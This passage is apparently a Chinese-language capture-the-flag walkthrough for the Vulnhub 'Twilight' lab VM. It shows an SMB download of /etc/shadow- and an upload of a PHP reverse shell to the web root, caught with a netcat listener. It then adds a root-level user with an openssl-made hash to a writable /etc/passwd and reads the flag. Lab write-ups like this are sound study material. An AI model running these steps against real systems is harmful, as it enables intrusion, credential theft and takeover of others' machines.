discover.conf.d D 0 Wed Jul 8 18:58:26 2020
binfmt.d D 0 Wed Jan 29 13:07:53 2020
7158264 blocks of size 1024. 4447412 blocks available
smb: \etc\> get shadow-
getting file \etc\shadow- of size 1036 as shadow- (505.8 KiloBytes/sec) (average 1425.6 KiloBytes/sec)
smb: \etc\> quit
可以通过SMB共享将shell.php脚本上传至网站根目录,
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ smbclient //192.168.56.174/WRKSHARE
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> cd /var/www/html
smb: \var\www\html\> put shell.php
putting file shell.php as \var\www\html\shell.php (1789.0 kb/s) (average 1789.1 kb/s)
smb: \var\www\html\> ls
. D 0 Sat Nov 12 21:18:11 2022
.. D 0 Wed Jul 15 21:44:37 2020
current.php N 152 Wed Jul 15 21:58:35 2020
shell.php A 5496 Sat Nov 12 21:18:11 2022
lang.php N 58 Wed Jul 15 22:03:45 2020
gallery D 0 Wed Jul 8 22:31:53 2020
index.php N 228 Wed Jul 15 22:03:51 2020
7158264 blocks of size 1024. 4447380 blocks available
smb: \var\www\html\>
访问该shell.php,即可获得目标主机的shell
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.174] 34876
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
21:19:16 up 40 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
提权
ls -alh /etc/passwd
-rwxrwxrwx 1 root root 1.6K Jul 16 2020 /etc/passwd
/etc/passwd文件拥有最多权限777,因此可以修改该文件,添加用户jason,并为超级用户
在Kali Linux上执行:
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ openssl passwd --help
Usage: passwd [options] [password]
General options:
-help Display this summary
Input options:
-in infile Read passwords from file
-noverify Never verify when reading password from terminal
-stdin Read passwords from stdin
Output options:
-quiet No warnings
-table Format output as table
-reverse Switch table columns
Cryptographic options:
-salt val Use provided salt
-6 SHA512-based password algorithm
-5 SHA256-based password algorithm
-apr1 MD5-based password algorithm, Apache variant
-1 MD5-based password algorithm
-aixmd5 AIX MD5-based password algorithm
Random state options:
-rand val Load the given file(s) into the random number generator
-writerand outfile Write random data to the specified file
Provider options:
-provider-path val Provider load path (must be before 'provider' argument if required)
-provider val Provider to load (can be specified multiple times)
-propquery val Property query used when fetching algorithms
Parameters:
password Password text to digest (optional)
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ openssl passwd -1 -salt jason 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61
将该用户添加到靶机/etc/passwd文件中去(可以在Kali Linxu本地编辑好该文件,然后通过SMB共享上传并覆盖passwd文件:
www-data@twilight:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:115::/var/spool/exim4:/usr/sbin/nologin
mysql:x:108:118::/nonexistent:/bin/false
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
www-data@twilight:/$ su - jason
su - jason
Password: 123456
root@twilight:~# cd /root
cd /root
root@twilight:~# ls
ls
root.txt
root@twilight:~# cat root.txt
cat root.txt
(\
\'\
\'\ __________
/ '| ()_________)
\ '/ \ ~~~~~~~~ \
\ \ ~~~~~~ \
==). \__________\
(__) ()__________)
34d3ecb1bbd092bcb87954cee55d88d3
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@twilight:~#
成功提权!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
